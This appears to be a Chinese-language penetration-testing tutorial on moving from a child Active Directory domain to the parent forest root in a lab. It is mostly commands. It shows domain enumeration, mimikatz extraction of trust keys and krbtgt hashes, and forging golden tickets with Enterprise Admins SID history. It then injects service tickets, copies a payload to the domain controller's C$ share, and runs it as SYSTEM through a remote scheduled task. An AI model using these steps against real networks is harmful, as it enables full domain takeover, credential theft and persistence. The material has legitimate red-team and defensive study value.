跨域攻击的方法介绍

跨域攻击的方法介绍


目录

• 跨域攻击的方法介绍
  
  
  
  • 一、内网中的域林
    
  • 二、跨域攻击方法
    
  • 三、获取域信息
    
  • 四、利用域信任密钥跨域
    
  • 五、利用krbtgt哈希值跨域
    
  
  

一、内网中的域林

很多大型企业都拥有自己的内网，一般通过域林进行共享资源。根据不同职能区分的部门，从逻辑上以主域和子域进行区分，以方便统一管理。在物理层，通常使用防火墙将各个子公司及各个部门划分为不同的区域。
二、跨域攻击方法

1、常规渗透方法（利用web漏洞）
2、哈希传递票据攻击
3、利用域信任关系
三、获取域信息

在域中，Enterprise Admins组（出现在林中的根域中）的成员具有对目录林中所有域的完全控制权限。在默认情况下，该组包含林中所有域控制器上具有Administrators权限的成员。
1、查看当前域中计算机的权限

1. whoami /all

复制代码

2、查看域信任关系

1. nltest /domain_trusts

复制代码

3、使用LG工具获取域信息
（1）获取当前域中的用户组

1. LG.exe 域名\.

复制代码

（2）获取远程机器的本地用户组

1. LG.exe \\计算机名 -lu

复制代码

（3）获取远程系统中的用户SID

1. LG.exe \\计算机名 -lu -sidsout

复制代码

四、利用域信任密钥跨域

1、实验环境
IP地址所属域域中地位机器名当前登录用户192.168.142.10candada.comcandada的域控DC1candada\administrator192.168.142.20test.candada.comtest子域的域控DC2test\administrator192.168.142.32test.candada.comtest子域的机器win10-2test\can已经控制住DC2和win10-2，目标是进一步控制DC1。
2、实验步骤
（1）使用mimikatz获取当前域的SID、父域的SID、子域域管的NTLM信任密钥。

1. mimikatz lsadump::trust /patch

复制代码

1. mimikatz lsadump::lsa /patch /user:candada$

复制代码

（2）在普通的域内用户中创建创建高权限票据

1. mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi

复制代码

1. mimikatz kerberos::golden /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /rc4:85ebc8bf10bf4e04c20f4b3ce0a553af /user:administrator /service:krbtgt /target:candada.com /ticket:administrator.kirbi

复制代码

（3）上传asktgs.exe和kirbikator.exe工具，asktgs.exe伪造票据，kirbikator.exe注入票据
创建CIFS服务的票据和host服务票据

1. shell asktgs.exe administrator.kirbi cifs/DC1.candada.com

复制代码

1. shell asktgs.exe administrator.kirbi host/DC1.candada.com

复制代码

将票据注入内存

1. shell kirbikator.exe lsa cifs.DC1.candada.com.kirbi

复制代码

复制文件的操作

1. shell copy can1.exe \\dc1.candada.com\c$

复制代码

1. shell dir \\dc1.candada.com\c$

复制代码

（4）进行创建计划任务

1. shell schtasks /create /s dc1.candada.com /tn test /sc onstart /tr c:\can1.exe /ru system /f

复制代码

（5）执行计划任务

1. schtasks /run /s dc1.candada.com /i /tn "test"

复制代码

（6）删除计划任务

1. shell schtasks /delete /s dc1.candada.com /tn "test" /f

复制代码

五、利用krbtgt哈希值跨域

1、实验环境
IP地址所属域域中地位机器名当前登录用户192.168.142.10candada.comcandada的域控DC1candada\administrator192.168.142.20test.candada.comtest子域的域控DC2test\administrator192.168.142.32test.candada.comtest子域的机器win10-2test\can已经控制住DC2和win10-2，目标是进一步控制DC1。
2、实验步骤
（1）获取Krbtgt散列

1. mimikatz lsadump::lsa /patch /user:krbtgt

复制代码

（2）获取当前域的SID、父域的SID

1. mimikatz lsadump::trust /patch

复制代码

（3）构造并注入黄金票据

1. Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列 /ptt

复制代码

1. mimikatz Kerberos::golden /user:administrator /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /krbtgt:dd30df5d4360179f04471b39ed515274 /ptt

复制代码

（4）后续可利用计划任务或者服务进行上线

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！